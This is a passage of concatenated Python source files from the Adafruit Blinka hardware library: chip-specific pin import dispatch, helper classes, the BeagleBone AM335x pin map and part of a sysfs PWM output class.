from adafruit_blinka.microcontroller.allwinner.h616.pin import *
elif chip_id == ap_chip.SAMA5:
from adafruit_blinka.microcontroller.sama5.pin import *
elif chip_id == ap_chip.T210:
from adafruit_blinka.microcontroller.tegra.t210.pin import *
elif chip_id == ap_chip.T186:
from adafruit_blinka.microcontroller.tegra.t186.pin import *
elif chip_id == ap_chip.T194:
from adafruit_blinka.microcontroller.tegra.t194.pin import *
elif chip_id == ap_chip.T234:
from adafruit_blinka.microcontroller.tegra.t234.pin import *
elif chip_id == ap_chip.S905:
from adafruit_blinka.microcontroller.amlogic.s905.pin import *
elif chip_id == ap_chip.S905X:
from adafruit_blinka.microcontroller.amlogic.s905x.pin import *
elif chip_id == ap_chip.S905X3:
from adafruit_blinka.microcontroller.amlogic.s905x3.pin import *
elif chip_id == ap_chip.S905Y2:
from adafruit_blinka.microcontroller.amlogic.s905y2.pin import *
elif chip_id == ap_chip.S922X:
from adafruit_blinka.microcontroller.amlogic.s922x.pin import *
elif chip_id == ap_chip.A311D:
from adafruit_blinka.microcontroller.amlogic.a311d.pin import *
elif chip_id == ap_chip.EXYNOS5422:
from adafruit_blinka.microcontroller.samsung.exynos5422.pin import *
elif chip_id == ap_chip.APQ8016:
from adafruit_blinka.microcontroller.snapdragon.apq8016.pin import *
elif chip_id == ap_chip.IMX8MX:
from adafruit_blinka.microcontroller.nxp_imx8m.pin import *
elif chip_id == ap_chip.IMX6ULL:
from adafruit_blinka.microcontroller.nxp_imx6ull.pin import *
elif chip_id == ap_chip.HFU540:
from adafruit_blinka.microcontroller.hfu540.pin import *
elif chip_id == ap_chip.FT232H:
from adafruit_blinka.microcontroller.ftdi_mpsse.ft232h.pin import *
elif chip_id == ap_chip.FT2232H:
from adafruit_blinka.microcontroller.ftdi_mpsse.ft2232h.pin import *
elif chip_id == ap_chip.BINHO:
from adafruit_blinka.microcontroller.nova.pin import *
elif chip_id == ap_chip.LPC4330:
from adafruit_blinka.microcontroller.nxp_lpc4330.pin import *
elif chip_id == ap_chip.MCP2221:
from adafruit_blinka.microcontroller.mcp2221.pin import *
elif chip_id == ap_chip.A64:
from adafruit_blinka.microcontroller.allwinner.a64.pin import *
elif chip_id == ap_chip.A33:
from adafruit_blinka.microcontroller.allwinner.a33.pin import *
elif chip_id == ap_chip.RK3308:
from adafruit_blinka.microcontroller.rockchip.rk3308.pin import *
elif chip_id == ap_chip.RK3399:
from adafruit_blinka.microcontroller.rockchip.rk3399.pin import *
elif chip_id == ap_chip.RK3399_T:
from adafruit_blinka.microcontroller.rockchip.rk3399.pin import *
elif chip_id == ap_chip.RK3588:
from adafruit_blinka.microcontroller.rockchip.rk3588.pin import *
elif chip_id == ap_chip.RK3328:
from adafruit_blinka.microcontroller.rockchip.rk3328.pin import *
elif chip_id == ap_chip.RK3566:
from adafruit_blinka.microcontroller.rockchip.rk3566.pin import *
elif chip_id == ap_chip.RK3568:
from adafruit_blinka.microcontroller.rockchip.rk3568.pin import *
elif chip_id == ap_chip.RK3568B2:
from adafruit_blinka.microcontroller.rockchip.rk3568b2.pin import *
elif chip_id == ap_chip.MIPS24KC:
from adafruit_blinka.microcontroller.atheros.ar9331.pin import *
elif chip_id == ap_chip.MIPS24KEC:
from adafruit_blinka.microcontroller.mips24kec.pin import *
elif chip_id == ap_chip.PENTIUM_N3710:
from adafruit_blinka.microcontroller.pentium.n3710.pin import *
elif chip_id == ap_chip.ATOM_J4105:
from adafruit_blinka.microcontroller.pentium.j4105.pin import *
elif chip_id == ap_chip.STM32MP157:
from adafruit_blinka.microcontroller.stm32.stm32mp157.pin import *
elif chip_id == ap_chip.MT8167:
from adafruit_blinka.microcontroller.mt8167.pin import *
elif chip_id == ap_chip.RP2040_U2IF:
from adafruit_blinka.microcontroller.rp2040_u2if.pin import *
elif chip_id == ap_chip.D1_RISCV:
from adafruit_blinka.microcontroller.allwinner.D1.pin import *
elif "sphinx" in sys.modules:
# pylint: disable=unused-import
from adafruit_blinka.microcontroller.generic_micropython import Pin
elif chip_id == ap_chip.GENERIC_X86:
print("WARNING: GENERIC_X86 is not fully supported. Some features may not work.")
from adafruit_blinka.microcontroller.generic_micropython import Pin
elif chip_id is None:
print(
"WARNING: chip_id == None is not fully supported. Some features may not work."
)
from adafruit_blinka.microcontroller.generic_micropython import Pin
else:
raise NotImplementedError("Microcontroller not supported: ", chip_id) | Adafruit-Blinka | /Adafruit_Blinka-8.20.1-py3-none-any.whl/microcontroller/pin.py | pin.py |
import sys
import time
from adafruit_platformdetect.constants import chips as ap_chip
from adafruit_blinka.agnostic import board_id, chip_id
from microcontroller import pin # pylint: disable=unused-import
from microcontroller.pin import Pin # pylint: disable=unused-import
def delay_us(delay):
"""Sleep for delay usecs."""
time.sleep(delay / 1e6)
# We intentionally are patching into this namespace so skip the wildcard check.
# pylint: disable=unused-wildcard-import,wildcard-import,ungrouped-imports
if chip_id == ap_chip.ESP8266:
from adafruit_blinka.microcontroller.esp8266 import *
elif chip_id == ap_chip.STM32F405:
from adafruit_blinka.microcontroller.stm32.stm32f405 import *
elif chip_id == ap_chip.RP2040:
from adafruit_blinka.microcontroller.rp2040 import *
elif chip_id == ap_chip.BCM2XXX:
if board_id in [
"RASPBERRY_PI_4B",
"RASPBERRY_PI_400",
"RASPBERRY_PI_CM4",
]:
from adafruit_blinka.microcontroller.bcm2711 import *
else:
from adafruit_blinka.microcontroller.bcm283x import *
elif chip_id == ap_chip.DRA74X:
from adafruit_blinka.microcontroller.dra74x import *
elif chip_id == ap_chip.AM33XX:
from adafruit_blinka.microcontroller.am335x import *
elif chip_id == ap_chip.AM65XX:
from adafruit_blinka.microcontroller.am65xx import *
elif chip_id == ap_chip.JH71x0:
from adafruit_blinka.microcontroller.starfive.JH71x0 import *
elif chip_id == ap_chip.SUN8I:
from adafruit_blinka.microcontroller.allwinner.h3 import *
elif chip_id == ap_chip.H5:
from adafruit_blinka.microcontroller.allwinner.h5 import *
elif chip_id == ap_chip.H6:
from adafruit_blinka.microcontroller.allwinner.h6 import *
elif chip_id == ap_chip.H616:
from adafruit_blinka.microcontroller.allwinner.h616 import *
elif chip_id == ap_chip.SAMA5:
from adafruit_blinka.microcontroller.sama5 import *
elif chip_id == ap_chip.T210:
from adafruit_blinka.microcontroller.tegra.t210 import *
elif chip_id == ap_chip.T186:
from adafruit_blinka.microcontroller.tegra.t186 import *
elif chip_id == ap_chip.T194:
from adafruit_blinka.microcontroller.tegra.t194 import *
elif chip_id == ap_chip.T234:
from adafruit_blinka.microcontroller.tegra.t234 import *
elif chip_id == ap_chip.S905:
from adafruit_blinka.microcontroller.amlogic.s905 import *
elif chip_id == ap_chip.S905X:
from adafruit_blinka.microcontroller.amlogic.s905x import *
elif chip_id == ap_chip.S905X3:
from adafruit_blinka.microcontroller.amlogic.s905x3 import *
elif chip_id == ap_chip.S905Y2:
from adafruit_blinka.microcontroller.amlogic.s905y2 import *
elif chip_id == ap_chip.S922X:
from adafruit_blinka.microcontroller.amlogic.s922x import *
elif chip_id == ap_chip.A311D:
from adafruit_blinka.microcontroller.amlogic.a311d import *
elif chip_id == ap_chip.EXYNOS5422:
from adafruit_blinka.microcontroller.samsung.exynos5422 import *
elif chip_id == ap_chip.APQ8016:
from adafruit_blinka.microcontroller.snapdragon.apq8016 import *
elif chip_id == ap_chip.A64:
from adafruit_blinka.microcontroller.allwinner.a64 import *
elif chip_id == ap_chip.A33:
from adafruit_blinka.microcontroller.allwinner.a33 import *
elif chip_id == ap_chip.RK3308:
from adafruit_blinka.microcontroller.rockchip.rk3308 import *
elif chip_id == ap_chip.RK3399:
from adafruit_blinka.microcontroller.rockchip.rk3399 import *
elif chip_id == ap_chip.RK3399_T:
from adafruit_blinka.microcontroller.rockchip.rk3399 import *
elif chip_id == ap_chip.RK3588:
from adafruit_blinka.microcontroller.rockchip.rk3588 import *
elif chip_id == ap_chip.RK3328:
from adafruit_blinka.microcontroller.rockchip.rk3328 import *
elif chip_id == ap_chip.RK3566:
from adafruit_blinka.microcontroller.rockchip.rk3566 import *
elif chip_id == ap_chip.RK3568:
from adafruit_blinka.microcontroller.rockchip.rk3568 import *
elif chip_id == ap_chip.H3:
from adafruit_blinka.microcontroller.allwinner.h3 import *
elif chip_id == ap_chip.H5:
from adafruit_blinka.microcontroller.allwinner.h5 import *
elif chip_id == ap_chip.IMX8MX:
from adafruit_blinka.microcontroller.nxp_imx8m import *
elif chip_id == ap_chip.IMX6ULL:
from adafruit_blinka.microcontroller.nxp_imx6ull import *
elif chip_id == ap_chip.HFU540:
from adafruit_blinka.microcontroller.hfu540 import *
elif chip_id == ap_chip.BINHO:
from adafruit_blinka.microcontroller.nova import *
elif chip_id == ap_chip.LPC4330:
from adafruit_blinka.microcontroller.nxp_lpc4330 import *
elif chip_id == ap_chip.MCP2221:
from adafruit_blinka.microcontroller.mcp2221 import *
elif chip_id == ap_chip.MIPS24KC:
from adafruit_blinka.microcontroller.atheros.ar9331 import *
elif chip_id == ap_chip.MIPS24KEC:
from adafruit_blinka.microcontroller.mips24kec import *
elif chip_id == ap_chip.FT232H:
from adafruit_blinka.microcontroller.ftdi_mpsse.ft232h import *
elif chip_id == ap_chip.FT2232H:
from adafruit_blinka.microcontroller.ftdi_mpsse.ft2232h import *
elif chip_id == ap_chip.PENTIUM_N3710:
from adafruit_blinka.microcontroller.pentium.n3710 import *
elif chip_id == ap_chip.ATOM_J4105:
from adafruit_blinka.microcontroller.pentium.j4105 import *
elif chip_id == ap_chip.STM32MP157:
from adafruit_blinka.microcontroller.stm32.stm32mp157 import *
elif chip_id == ap_chip.MT8167:
from adafruit_blinka.microcontroller.mt8167 import *
elif chip_id == ap_chip.RP2040_U2IF:
from adafruit_blinka.microcontroller.rp2040_u2if import *
elif chip_id == ap_chip.D1_RISCV:
from adafruit_blinka.microcontroller.allwinner.D1 import *
elif chip_id == ap_chip.GENERIC_X86:
print("WARNING: GENERIC_X86 is not fully supported. Some features may not work.")
elif chip_id is None:
print(
"WARNING: chip_id == None is not fully supported. Some features may not work."
)
elif "sphinx" in sys.modules:
pass
else:
raise NotImplementedError("Microcontroller not supported:", chip_id) | Adafruit-Blinka | /Adafruit_Blinka-8.20.1-py3-none-any.whl/microcontroller/__init__.py | __init__.py |
class Enum:
"""
Object supporting CircuitPython-style of static symbols
as seen with Direction.OUTPUT, Pull.UP
"""
def __repr__(self):
"""
Assumes instance will be found as attribute of own class.
Returns dot-subscripted path to instance
(assuming absolute import of containing package)
"""
cls = type(self)
for key in dir(cls):
if getattr(cls, key) is self:
return "{}.{}.{}".format(cls.__module__, cls.__qualname__, key)
return repr(self)
@classmethod
def iteritems(cls):
"""
Inspects attributes of the class for instances of the class
and returns as key,value pairs mirroring dict#iteritems
"""
for key in dir(cls):
val = getattr(cls, key)
if isinstance(cls, val):
yield (key, val)
class ContextManaged:
"""An object that automatically deinitializes hardware with a context manager."""
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.deinit()
# pylint: disable=no-self-use
def deinit(self):
"""Free any hardware used by the object."""
return
# pylint: enable=no-self-use
class Lockable(ContextManaged):
"""An object that must be locked to prevent collisions on a microcontroller resource."""
_locked = False
def try_lock(self):
"""Attempt to grab the lock. Return True on success, False if the lock is already taken."""
if self._locked:
return False
self._locked = True
return True
def unlock(self):
"""Release the lock so others may use the resource."""
if self._locked:
self._locked = False
else:
raise ValueError("Not locked")
def patch_system():
"""Patch modules that may be different due to the platform."""
# pylint: disable=import-outside-toplevel
import sys
from adafruit_blinka.agnostic import time
# pylint: enable=import-outside-toplevel
sys.modules["time"] = time | Adafruit-Blinka | /Adafruit_Blinka-8.20.1-py3-none-any.whl/adafruit_blinka/__init__.py | __init__.py |
"""AM335x pin names"""
from Adafruit_BBIO import GPIO
class Pin:
"""Pins dont exist in CPython so...lets make our own!"""
IN = 0
OUT = 1
LOW = 0
HIGH = 1
PULL_NONE = 0
PULL_UP = 1
PULL_DOWN = 2
id = None
_value = LOW
_mode = IN
def __init__(self, pin_name):
self.id = pin_name
def __repr__(self):
return str(self.id)
def __eq__(self, other):
return self.id == other
def init(self, mode=IN, pull=None):
"""Initialize the Pin"""
if mode is not None:
if mode == self.IN:
self._mode = self.IN
GPIO.setup(self.id, GPIO.IN)
elif mode == self.OUT:
self._mode = self.OUT
GPIO.setup(self.id, GPIO.OUT)
else:
raise RuntimeError("Invalid mode for pin: %s" % self.id)
if pull is not None:
if self._mode != self.IN:
raise RuntimeError("Cannot set pull resistor on output")
if pull == self.PULL_UP:
GPIO.setup(self.id, GPIO.IN, pull_up_down=GPIO.PUD_UP)
elif pull == self.PULL_DOWN:
GPIO.setup(self.id, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
else:
raise RuntimeError("Invalid pull for pin: %s" % self.id)
def value(self, val=None):
"""Set or return the Pin Value"""
if val is not None:
if val == self.LOW:
self._value = val
GPIO.output(self.id, val)
elif val == self.HIGH:
self._value = val
GPIO.output(self.id, val)
else:
raise RuntimeError("Invalid value for pin")
return None
return GPIO.input(self.id)
# names in comments copied from
# https://github.com/adafruit/adafruit-beaglebone-io-python/blob/master/source/common.c#L73
# PocketBeagle
# P1_1 = SYS VIN # VIN_AC
P1_2 = Pin("P1_2") # GPIO2_23 - GPIO_87
P1_3 = Pin("P1_3") # USB1_VBUS_OUT - (silkscreen: USB1 V_EN)
P1_4 = Pin("P1_4") # GPIO2_25 - GPIO_89
# P1_5 = USB VBUS # USB1_VBUS_IN
P1_6 = Pin("P1_6") # SPI0_CS0 - GPIO_5
# P1_7 = USB VIN # VIN-USB
P1_8 = Pin("P1_8") # SPI0_SCLK - GPIO_2
# P1_9 = USB1 DN # USB1-DN
P1_10 = Pin("P1_10") # SPI0_D0 - GPIO_3
# P1_11 = USB1 DP # USB1-DP
P1_12 = Pin("P1_12") # SPI0_D1 - GPIO_4
# P1_13 = USB1 ID # USB1-ID
# P1_14 = SYS 3.3V # VOUT-3.3V
# P1_15 = SYS GND # GND
# P1_16 = SYS GND # GND
# P1_17 = AIN 1.8V REF- # VREFN
# P1_18 = AIN 1.8V REF+ # VREFP
P1_19 = Pin("P1_19") # AIN0
P1_20 = Pin("P1_20") # GPIO0_20 - GPIO_20
P1_21 = Pin("P1_21") # AIN1
# P1_22 = SYS GND # GND
P1_23 = Pin("P1_23") # AIN2
# P1_22 = SYS VOUT # VOUT-5V
P1_25 = Pin("P1_25") # AIN3
P1_26 = Pin("P1_26") # I2C2_SDA - GPIO_12
P1_27 = Pin("P1_27") # AIN4
P1_28 = Pin("P1_28") # I2C2_SCL - GPIO_13
P1_29 = Pin("P1_29") # GPIO3_21 - GPIO_117
P1_30 = Pin("P1_30") # UART0_TXD - GPIO_43
P1_31 = Pin("P1_31") # GPIO3_18 - GPIO_114
P1_32 = Pin("P1_32") # UART0_RXD - GPIO_42
P1_33 = Pin("P1_33") # GPIO3_15 - GPIO_111
P1_34 = Pin("P1_34") # GPIO0_26 - GPIO_26
P1_35 = Pin("P1_35") # GPIO2_24 - GPIO_88
P1_36 = Pin("P1_36") # EHRPWM0A - GPIO_110
P2_1 = Pin("P2_1") # EHRPWM1A - GPIO_50
P2_2 = Pin("P2_2") # GPIO1_27 - GPIO_59
P2_3 = Pin("P2_3") # GPIO0_23 - GPIO_23
P2_4 = Pin("P2_4") # GPIO1_26 - GPIO_58
P2_5 = Pin("P2_5") # UART4_RXD - GPIO_30
P2_6 = Pin("P2_6") # GPIO1_25 - GPIO_57
P2_7 = Pin("P2_7") # UART4_TXD - GPIO_31
P2_8 = Pin("P2_8") # GPIO1_28 - GPIO_60
P2_9 = Pin("P2_9") # I2C1_SCL - GPIO_15
P2_10 = Pin("P2_10") # GPIO1_20 - GPIO_52
P2_11 = Pin("P2_11") # I2C1_SDA - GPIO_14
# P2_12 = SYS PWR BTN # POWER_BUTTON
# P2_13 = SYS VOUT # VOUT-5V
# P2_14 = BAT VIN # BAT-VIN
# P2_15 = SYS GND # GND
# P2_16 = BAT TEMP # BAT-TEMP
P2_17 = Pin("P2_17") # GPIO2_1 - GPIO_65
P2_18 = Pin("P2_18") # GPIO1_15 - GPIO_47
P2_19 = Pin("P2_19") # GPIO0_27 - GPIO_27
P2_20 = Pin("P2_20") # GPIO2_0 - GPIO_64
# P2_21 = SYS GND # GND
P2_22 = Pin("P2_22") # GPIO1_14 - GPIO_46
# P2_23 = SYS 3.3V # VOUT-3.3V
P2_24 = Pin("P2_24") # GPIO1_12 - GPIO_44
P2_25 = Pin("P2_25") # SPI1_D1 - GPIO_41
# P2_26 = SYS NRST # RESET#
P2_27 = Pin("P2_27") # SPI1_D0 - GPIO_40
P2_28 = Pin("P2_28") # GPIO3_20 - GPIO_116
P2_29 = Pin("P2_29") # SPI1_SCLK - GPIO_7
P2_30 = Pin("P2_30") # GPIO3_17 - GPIO_113
P2_31 = Pin("P2_31") # SPI1_CS1 - GPIO_19
P2_32 = Pin("P2_32") # GPIO3_16 - GPIO_112
P2_33 = Pin("P2_33") # GPIO1_13 - GPIO_45
P2_34 = Pin("P2_34") # GPIO3_19 - GPIO_115
P2_35 = Pin("P2_35") # GPIO2_22 - GPIO_86
P2_36 = Pin("P2_36") # AIN7
# BeagleBone Black
# P8_1 = DGND # DGND - GPIO_0
# P8_2 = DGND # DGND - GPIO_0
P8_3 = Pin("P8_3") # GPIO1_6 - GPIO_38
P8_4 = Pin("P8_4") # GPIO1_7 - GPIO_39
P8_5 = Pin("P8_5") # GPIO1_2 - GPIO_34
P8_6 = Pin("P8_6") # GPIO1_3 - GPIO_35
P8_7 = Pin("P8_7") # TIMER4 - GPIO_66
P8_8 = Pin("P8_8") # TIMER7 - GPIO_67
P8_9 = Pin("P8_9") # TIMER5 - GPIO_69
P8_10 = Pin("P8_10") # TIMER6 - GPIO_68
P8_11 = Pin("P8_11") # GPIO1_13 - GPIO_45
P8_12 = Pin("P8_12") # GPIO1_12 - GPIO_44
P8_13 = Pin("P8_13") # EHRPWM2B - GPIO_23
P8_14 = Pin("P8_14") # GPIO0_26 - GPIO_26
P8_15 = Pin("P8_15") # GPIO1_15 - GPIO_47
P8_16 = Pin("P8_16") # GPIO1_14 - GPIO_46
P8_17 = Pin("P8_17") # GPIO0_27 - GPIO_27
P8_18 = Pin("P8_18") # GPIO2_1 - GPIO_65
P8_19 = Pin("P8_19") # EHRPWM2A - GPIO_22
P8_20 = Pin("P8_20") # GPIO1_31 - GPIO_63
P8_21 = Pin("P8_21") # GPIO1_30 - GPIO_62
P8_22 = Pin("P8_22") # GPIO1_5 - GPIO_37
P8_23 = Pin("P8_23") # GPIO1_4 - GPIO_36
P8_24 = Pin("P8_24") # GPIO1_1 - GPIO_33
P8_25 = Pin("P8_25") # GPIO1_0 - GPIO_32
P8_26 = Pin("P8_26") # GPIO1_29 - GPIO_61
P8_27 = Pin("P8_27") # GPIO2_22 - GPIO_86
P8_28 = Pin("P8_28") # GPIO2_24 - GPIO_88
P8_29 = Pin("P8_29") # GPIO2_23 - GPIO_87
P8_30 = Pin("P8_30") # GPIO2_25 - GPIO_89
P8_31 = Pin("P8_31") # UART5_CTSN - GPIO_10
P8_32 = Pin("P8_32") # UART5_RTSN - GPIO_11
P8_33 = Pin("P8_33") # UART4_RTSN - GPIO_9
P8_34 = Pin("P8_34") # UART3_RTSN - GPIO_81
P8_35 = Pin("P8_35") # UART4_CTSN - GPIO_8
P8_36 = Pin("P8_36") # UART3_CTSN - GPIO_80
P8_37 = Pin("P8_37") # UART5_TXD - GPIO_78
P8_38 = Pin("P8_38") # UART5_RXD - GPIO_79
P8_39 = Pin("P8_39") # GPIO2_12 - GPIO_76
P8_40 = Pin("P8_40") # GPIO2_13 - GPIO_77
P8_41 = Pin("P8_41") # GPIO2_10 - GPIO_74
P8_42 = Pin("P8_42") # GPIO2_11 - GPIO_75
P8_43 = Pin("P8_43") # GPIO2_8 - GPIO_72
P8_44 = Pin("P8_44") # GPIO2_9 - GPIO_73
P8_45 = Pin("P8_45") # GPIO2_6 - GPIO_70
P8_46 = Pin("P8_46") # GPIO2_7 - GPIO_71
# P9_1 = DGND # DGND - GPIO_0
# P9_2 = DGND # DGND - GPIO_0
# P9_3 = VDD_3V3 # VDD_3V3 - GPIO_0
# P9_4 = VDD_3V3 # VDD_3V3 - GPIO_0
# P9_5 = VDD_5V # VDD_5V - GPIO_0
# P9_6 = VDD_5V # VDD_5V - GPIO_0
# P9_7 = SYS_5V # SYS_5V - GPIO_0
# P9_8 = SYS_5V # SYS_5V - GPIO_0
# P9_9 = PWR_BUT # PWR_BUT - GPIO_0
# P9_10 = SYS_RESETN # SYS_RESETn - GPIO_0
P9_11 = Pin("P9_11") # UART4_RXD - GPIO_30
P9_12 = Pin("P9_12") # GPIO1_28 - GPIO_60
P9_13 = Pin("P9_13") # UART4_TXD - GPIO_31
P9_14 = Pin("P9_14") # EHRPWM1A - GPIO_50
P9_15 = Pin("P9_15") # GPIO1_16 - GPIO_48
P9_16 = Pin("P9_16") # EHRPWM1B - GPIO_51
P9_17 = Pin("P9_17") # I2C1_SCL - GPIO_5
P9_18 = Pin("P9_18") # I2C1_SDA - GPIO_4
P9_19 = Pin("P9_19") # I2C2_SCL - GPIO_13
P9_20 = Pin("P9_20") # I2C2_SDA - GPIO_12
P9_21 = Pin("P9_21") # UART2_TXD - GPIO_3
P9_22 = Pin("P9_22") # UART2_RXD - GPIO_2
P9_23 = Pin("P9_23") # GPIO1_17 - GPIO_49
P9_24 = Pin("P9_24") # UART1_TXD - GPIO_15
P9_25 = Pin("P9_25") # GPIO3_21 - GPIO_117
P9_26 = Pin("P9_26") # UART1_RXD - GPIO_14
P9_27 = Pin("P9_27") # GPIO3_19 - GPIO_115
P9_28 = Pin("P9_28") # SPI1_CS0 - GPIO_113
P9_29 = Pin("P9_29") # SPI1_D0 - GPIO_111
P9_30 = Pin("P9_30") # SPI1_D1 - GPIO_112
P9_31 = Pin("P9_31") # SPI1_SCLK - GPIO_110
# P9_32 = VDD_ADC # VDD_ADC - GPIO_0
# P9_33 = AIN4 # AIN4 - GPIO_0
# P9_34 = GNDA_ADC # GNDA_ADC - GPIO_0
# P9_35 = AIN6 # AIN6 - GPIO_0
# P9_36 = AIN5 # AIN5 - GPIO_0
# P9_37 = AIN2 # AIN2 - GPIO_0
# P9_38 = AIN3 # AIN3 - GPIO_0
# P9_39 = AIN0 # AIN0 - GPIO_0
# P9_40 = AIN1 # AIN1 - GPIO_0
P9_41 = Pin("P9_41") # CLKOUT2 - GPIO_20
P9_42 = Pin("P9_42") # GPIO0_7 - GPIO_7
# P9_43 = DGND # DGND - GPIO_0
# P9_44 = DGND # DGND - GPIO_0
# P9_45 = DGND # DGND - GPIO_0
# P9_46 = DGND # DGND - GPIO_0
##########################################
# common to all beagles
USR0 = Pin("USR0") # USR0 - GPIO_53
USR1 = Pin("USR1") # USR1 - GPIO_54
USR2 = Pin("USR2") # USR2 - GPIO_55
USR3 = Pin("USR3") # USR3 - GPIO_56
##########################################
# specials
# analog input
AIN0 = Pin("AIN0")
AIN1 = Pin("AIN1")
AIN2 = Pin("AIN2")
AIN3 = Pin("AIN3")
AIN4 = Pin("AIN4")
AIN5 = Pin("AIN5")
AIN6 = Pin("AIN6")
AIN7 = Pin("AIN7")
# PWM
EHRPWM0A = Pin("EHRPWM0A")
EHRPWM0B = Pin("EHRPWM0B")
EHRPWM1A = Pin("EHRPWM1A")
EHRPWM1B = Pin("EHRPWM1B")
EHRPWM2A = Pin("EHRPWM2A")
EHRPWM2B = Pin("EHRPWM2B")
ECAPPWM0 = Pin("ECAPPWM0")
ECAPPWM2 = Pin("ECAPPWM2")
TIMER4 = Pin("TIMER4")
TIMER5 = Pin("TIMER5")
TIMER6 = Pin("TIMER6")
TIMER7 = Pin("TIMER7")
# I2C1
I2C1_SDA = Pin("I2C1_SDA")
I2C1_SCL = Pin("I2C1_SCL")
# I2C2
I2C2_SDA = Pin("I2C2_SDA")
I2C2_SCL = Pin("I2C2_SCL")
# SPI0
SPI0_CS0 = Pin("SPI0_CS0")
SPI0_SCLK = Pin("SPI0_SCLK")
SPI0_D1 = Pin("SPI0_D1")
SPI0_D0 = Pin("SPI0_D0")
# SPI1
SPI1_CS0 = Pin("SPI1_CS0")
SPI1_CS1 = Pin("SPI1_CS1")
SPI1_SCLK = Pin("SPI1_SCLK")
SPI1_D1 = Pin("SPI1_D1")
SPI1_D0 = Pin("SPI1_D0")
# UART0
UART0_TXD = Pin("UART0_TXD")
UART0_RXD = Pin("UART0_RXD")
# UART1
UART1_TXD = Pin("UART1_TXD")
UART1_RXD = Pin("UART1_RXD")
UART1_RTSn = Pin("UART1_RTSn")
UART1_CTSn = Pin("UART1_CTSn")
# UART2
UART2_TXD = Pin("UART2_TXD")
UART2_RXD = Pin("UART2_RXD")
# UART3
UART3_TXD = Pin("UART3_TXD")
UART3_RXD = Pin("UART3_RXD")
UART3_RTSn = Pin("UART3_RTSn")
UART3_CTSn = Pin("UART3_CTSn")
# UART4
UART4_TXD = Pin("UART4_TXD")
UART4_RXD = Pin("UART4_RXD")
UART4_RTSn = Pin("UART4_RTSn")
UART4_CTSn = Pin("UART4_CTSn")
# UART5
UART5_TXD = Pin("UART5_TXD")
UART5_RXD = Pin("UART5_RXD")
UART5_RTSn = Pin("UART5_RTSn")
UART5_CTSn = Pin("UART5_CTSn")
# ordered as spiId, sckId, mosiId, misoId
spiPorts = (
(0, SPI0_SCLK, SPI0_D1, SPI0_D0),
(1, SPI1_SCLK, SPI1_D1, SPI1_D0),
)
# ordered as uartId, txId, rxId
uartPorts = (
# (0, UART0_TXD, UART0_RXD),
# (1, UART1_TXD, UART1_RXD),
# (2, UART2_TXD, UART2_RXD),
# (4, UART4_TXD, UART4_RXD),
# (5, UART5_TXD, UART5_RXD),
)
# ordered as i2cId, SCL, SDA
i2cPorts = (
(1, I2C1_SCL, I2C1_SDA),
(2, I2C2_SCL, I2C2_SDA),
)
PWM1 = P1_36
PWM2 = P1_33
PWM3 = P2_1
PWM4 = P2_3
pwmOuts = (((0, 0), PWM1), ((0, 1), PWM2), ((2, 0), PWM3), ((4, 1), PWM4)) | Adafruit-Blinka | /Adafruit_Blinka-8.20.1-py3-none-any.whl/adafruit_blinka/microcontroller/am335x/pin.py | pin.py |
import os
try:
from microcontroller.pin import pwmOuts
except ImportError:
raise RuntimeError("No PWM outputs defined for this board") from ImportError
# pylint: disable=unnecessary-pass
class PWMError(IOError):
"""Base class for PWM errors."""
pass
# pylint: enable=unnecessary-pass
class PWMOut:
"""Pulse Width Modulation Output Class"""
# Sysfs paths
_sysfs_path = "/sys/class/pwm/"
_channel_path = "pwmchip{}"
# Channel paths
_export_path = "export"
_unexport_path = "unexport"
_pin_path = "pwm-{}:{}"
# Pin attribute paths
_pin_period_path = "period"
_pin_duty_cycle_path = "duty_cycle"
_pin_polarity_path = "polarity"
_pin_enable_path = "enable"
def __init__(self, pin, *, frequency=500, duty_cycle=0, variable_frequency=False):
"""Instantiate a PWM object and open the sysfs PWM corresponding to the
specified channel and pin.
Args:
pin (Pin): CircuitPython Pin object to output to
duty_cycle (int) : The fraction of each pulse which is high. 16-bit
frequency (int) : target frequency in Hertz (32-bit)
variable_frequency (bool) : True if the frequency will change over time
Returns:
PWMOut: PWMOut object.
Raises:
PWMError: if an I/O or OS error occurs.
TypeError: if `channel` or `pin` types are invalid.
ValueError: if PWM channel does not exist.
"""
self._pwmpin = None
self._channel = None
self._period = 0
self._open(pin, duty_cycle, frequency, variable_frequency)
def __del__(self):
self.deinit()
def __enter__(self):
return self
def __exit__(self, t, value, traceback):
self.deinit()
def _open(self, pin, duty=0, freq=500, variable_frequency=False):
self._channel = None
for pwmpair in pwmOuts:
if pwmpair[1] == pin:
self._channel = pwmpair[0][0]
self._pwmpin = pwmpair[0][1]
self._pin = pin
if self._channel is None:
raise RuntimeError("No PWM channel found for this Pin")
if variable_frequency:
print("Variable Frequency is not supported, continuing without it...")
channel_path = os.path.join(
self._sysfs_path, self._channel_path.format(self._channel)
)
if not os.path.isdir(channel_path):
raise ValueError(
"PWM channel does not exist, check that the required modules are loaded."
)
pin_path = os.path.join(
channel_path, self._pin_path.format(self._channel, self._pwmpin)
)
if not os.path.isdir(pin_path):
try:
with open(
os.path.join(channel_path, self._export_path), "w", encoding="utf-8"
) as f_export:
f_export.write("%d\n" % self._pwmpin)
except IOError as e:
raise PWMError(e.errno, "Exporting PWM pin: " + e.strerror) from IOError
# Look up the period, for fast duty cycle updates
self._period = self._get_period()
# set frequency
self.frequency = freq
# set duty
self.duty_cycle = duty
self._set_enabled(True)
def deinit(self):
"""Deinit the sysfs PWM."""
# pylint: disable=broad-except
try:
channel_path = os.path.join(
self._sysfs_path, self._channel_path.format(self._channel)
)
if self._channel is not None:
# self.duty_cycle = 0
self._set_enabled(False) # make to disable before unexport
try:
# unexport_path = os.path.join(channel_path, self._unexport_path)
with open(
os.path.join(channel_path, self._unexport_path),
"w",
encoding="utf-8",
) as f_unexport:
f_unexport.write("%d\n" % self._pwmpin)
except IOError as e:
raise PWMError(
e.errno, "Unexporting PWM pin: " + e.strerror
) from IOError
except Exception as e:
# due to a race condition for which I have not yet been
# able to find the root cause, deinit() often fails
# but it does not effect future usage of the pwm pin
print(
"warning: failed to deinitialize pwm pin {0}:{1} due to: {2}\n".format(
self._channel, self._pwmpin, type(e).__name__
)
)
finally:
self._channel = None
self._pwmpin = None
# pylint: enable=broad-except
def _is_deinited(self):
if self._pwmpin is None:
raise ValueError(
"Object has been deinitialize and can no longer "
"be used. Create a new object."
)
def _write_pin_attr(self, attr, value):
# Make sure the pin is active
self._is_deinited()
path = os.path.join(
self._sysfs_path,
self._channel_path.format(self._channel),
self._pin_path.format(self._channel, self._pwmpin),
attr,
)
